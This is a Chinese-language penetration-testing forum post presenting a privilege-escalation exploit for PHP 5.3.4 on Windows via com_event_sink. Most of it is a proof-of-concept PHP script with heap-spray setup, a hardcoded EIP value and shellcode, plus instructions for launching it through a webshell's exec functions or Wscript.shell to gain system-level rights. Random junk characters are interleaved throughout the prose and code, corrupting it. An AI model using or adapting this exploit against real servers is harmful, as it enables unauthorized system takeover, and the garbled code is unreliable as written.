中国网络渗透测试联盟

标题: PHP 5.3.4(WIN) COM_SINK权限提升漏洞 [打印本页]

作者: admin    时间: 2012-11-9 21:08
标题: PHP 5.3.4(WIN) COM_SINK权限提升漏洞
PHP最新版已经更新至5.4.x,不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中, [5 J( r8 N0 q3 I5 {, D
; S2 B. G8 }% c( ]- p. d
测试方法如下:cmd /c x:\php\php.exe x:\test.php
: Z: K  {5 R% u6 }+ b$ z4 ~7 o" g0 x6 {) I
下载php程序至本地,然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行,或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php
2 _3 Z3 A  o- x这里是两个测试的截图:
" I+ C/ @! M2 B6 }/ u' s. b, p/ X9 D' [2 Y/ l; ]" k# {1 L

2 r# b+ N2 d' i7 T) [% W3 y  x, w' L; e# z

3 _+ l/ B5 d. O
* a0 a; ?6 e& q8 W& ]& @成功利用此漏洞的攻击者将获得系统的最高权限/ h5 }' B7 X. `; Y- C
& l- W& X7 w" J: _" V
: [$ v2 s( j% E( k+ [# h
! r8 Z  v; ?9 ~

' b+ e' ?/ h. z5 S: M% n
. _( W! l' [4 V) `9 \关于漏洞分析稍后附上。一下是PoC代码:. `5 `  a9 N* Y  t+ ]8 A: `

4 H' |, I( H' J9 `<?php
2 F0 a' J1 q" [! [1 Y0 P3 e//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞
. N6 N, ^, R  a//$eip ="\x44\x43\x42\x41";/ B- o7 M, M8 V0 x' q
$eip= "\x4b\xe8\x57\x78";
+ \# W% `" R: _4 E6 a$eax ="\x80\x01\x8d\x04";
2 w# c5 B4 B# z  `8 l5 ?$deodrant="";
( g7 n2 Q6 w! e3 z- L$axespray = str_repeat($eip.$eax,0x80);  l- R" e% z2 K- ?! r. m. O! Q* q# b
//048d0190& g8 T1 s9 Y' E# U* J. e
echo strlen($axespray);
' W9 g6 [) v1 k0 \2 r9 Fecho "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";# ]/ B; T- \$ f; x! m. [+ c
echo "Silic Group Hacker Army - BlackBap.Org";
1 ^2 t3 u  `* A, a% Z6 O//19200 ==4B32 4b00, w: _# x, a7 e# j& r( z1 L
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}
% m% f9 j% Y% w0 r1 i3 s) E$terminate = "T";7 J6 l8 n2 X" }% X0 ]1 F4 ~
$u[] =$deodrant;$ w0 P+ _& X1 `3 A) _
$r[] =$deodrant.$terminate;( V6 N1 S: w% E
$a[] =$deodrant.$terminate;' l8 S/ ~! s8 t. P4 z, q
$s[] =$deodrant.$terminate;
5 e) n8 a, N2 g) M9 x//$vVar = new VARIANT(0x048d0038+$offset);        这里是可控可改的; z0 \& N9 u2 c+ T( N# O) @. w+ D! J
$vVar = new VARIANT(0x048d0000+180);
0 Y( O! T7 [: ^, L9 @5 s( [//弹窗代码(Shellcode)$ d7 w: H0 K0 z+ o2 H% H
$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";
( ^1 K( a8 f1 O) `% h8 ^# ~% a( v" b$var2 = new VARIANT(0x41414242);
4 `8 x* a( w9 O, g# y, k/ pcom_event_sink($vVar,$var2,$buffer);% t3 ^' V5 H3 d0 Q
?>, o- V! ?0 Y' z5 |4 U, P
[attach]113[/attach][attach]114[/attach]




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2